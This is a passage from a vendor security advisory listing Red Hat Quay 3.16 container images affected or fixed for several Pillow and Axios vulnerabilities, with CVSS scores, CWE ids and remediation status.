Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-40192

A flaw was found in Pillow, a Python imaging library. This vulnerability allows a remote attacker to trigger a denial of service (DoS) by providing a specially crafted FITS image file. The library's failure to limit the amount of GZIP-compressed data during decoding can lead to unbounded memory consumption, causing the system to crash or experience severe performance issues.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-409 - Improper Handling of Highly Compressed Data (Data Amplification)

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Important

CVE-2026-40895

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CWE-212 - Improper Removal of Sensitive Information Before Storage or Transfer

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix

Known not affected 19 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le		—

Threats

Impact Important

CVE-2026-42033

A flaw was found in Axios, an HTTP client library. This vulnerability allows an attacker to exploit a prototype pollution issue if another part of the application has already polluted the Object.prototype. By doing so, the attacker can intercept and modify JSON responses or take control of the HTTP communication. This could lead to unauthorized access to sensitive information like user credentials and request details.

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix

Known not affected 19 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le		—

Threats

Impact Important

CVE-2026-42035

A flaw was found in Axios, a software library for making network requests. A remote attacker can exploit a prototype pollution vulnerability to inject arbitrary HTTP headers into outgoing requests. This occurs when the application's core object definitions are manipulated, causing Axios to misinterpret data and include attacker-controlled headers in network communications. This could lead to unauthorized actions or data manipulation.

7.4 (High)


                        
                          CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix Workaround

Known not affected 19 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64	—	Workaround
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le	—	Workaround

Threats

Impact Moderate

CVE-2026-42039

A flaw was found in Axios, a promise-based HTTP client for browsers and Node.js. This vulnerability occurs because the `toFormData` function recursively processes nested objects without a depth limit. A remote attacker can exploit this by sending deeply nested request data, which causes the Node.js process to crash due to a RangeError, leading to a potential Denial of Service (DoS) if the process crashes.

7.5 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CWE-770 - Allocation of Resources Without Limits or Throttling

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix

Known not affected 19 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le		—

Threats

Impact Important

CVE-2026-42041

A flaw was found in Axios, a promise-based HTTP client. This vulnerability, a Prototype Pollution "Gadget" attack, allows an attacker to manipulate the `Object.prototype.validateStatus` property. By polluting this property, all HTTP error responses (such as 401, 403, or 500) are silently treated as successful responses. This can lead to a complete bypass of application-level authentication and error handling, potentially granting unauthorized access.

8.2 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

CWE-915 - Improperly Controlled Modification of Dynamically-Determined Object Attributes

Affected products

Fixed 4 products

Product	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x	—	Vendor Fix fix
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le	—	Vendor Fix fix

Known not affected 19 products

Product	Identifier	Version	Remediation
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64		—
Unresolved product id: Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le		—
